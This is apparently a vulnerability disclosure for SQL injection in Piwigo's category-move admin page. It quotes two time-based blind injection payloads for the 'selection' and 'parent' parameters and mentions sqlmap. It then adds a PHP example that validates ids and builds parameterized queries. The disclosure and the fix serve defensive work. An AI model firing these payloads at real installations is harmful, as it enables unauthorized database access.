Hi, I found a SQL injection vulnerability in cat_move.php:
The 'move_categories' method is called when moving the album in '/admin.php?page=cat_move', but the method does not validate and filter the 'selection' and 'parent' parameters, thus causing the vulnerability.
Replace any of the following parameters in POST requests to reproduce the vulnerability:
selection%5B%5D=1)` and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23
or
parent=1 and if(ascii(substr(database(),1,1))>300,1,sleep(5));%23
I use 'sqlmap' to reproduce the vulnerability:
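
One way to validate the two parameters named in the report before they reach any SQL, shown as an added example that is not part of the original report and is not Piwigo's own code. The helper names, the `categories` table, the `id_uppercat` column and the rule that ids are non-negative integers are assumptions made for illustration.

```php
<?php
// Added example with hypothetical helpers; not taken from Piwigo.

/** Return $value as a non-negative integer id, or throw. */
function require_id($value): int
{
    if (!is_string($value) && !is_int($value)) {
        throw new InvalidArgumentException('id must be a scalar');
    }
    // Digits only, anchored at both ends: anything such as
    // "1 and if(...)" fails here instead of being concatenated into SQL.
    if (!preg_match('/\A(0|[1-9][0-9]{0,8})\z/', (string) $value)) {
        throw new InvalidArgumentException('id is not an integer');
    }
    return (int) $value;
}

/** Validate an array parameter such as selection[] element by element. */
function require_id_list($values): array
{
    if (!is_array($values) || $values === []) {
        throw new InvalidArgumentException('expected a non-empty id list');
    }
    return array_values(array_unique(array_map('require_id', $values)));
}

/** Build a parameterized statement; table and column names are assumed. */
function build_move_query(array $post): array
{
    $ids    = require_id_list($post['selection'] ?? null);
    $parent = require_id($post['parent'] ?? null);
    $marks  = implode(',', array_fill(0, count($ids), '?'));
    $sql    = "UPDATE categories SET id_uppercat = ? WHERE id IN ($marks)";
    return [$sql, array_merge([$parent], $ids)];
}

// Constructed sample requests: one well-formed, one carrying the
// 'parent' value quoted in the report (URL-decoded).
$samples = [
    ['selection' => ['1', '7'], 'parent' => '3'],
    ['selection' => ['1'],
     'parent' => '1 and if(ascii(substr(database(),1,1))>300,1,sleep(5));#'],
];
foreach ($samples as $post) {
    try {
        [$sql, $params] = build_move_query($post);
        echo $sql, ' <- ', json_encode($params), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The returned statement and parameter list are meant to be passed to a prepared-statement API, so the validated integers are bound rather than concatenated.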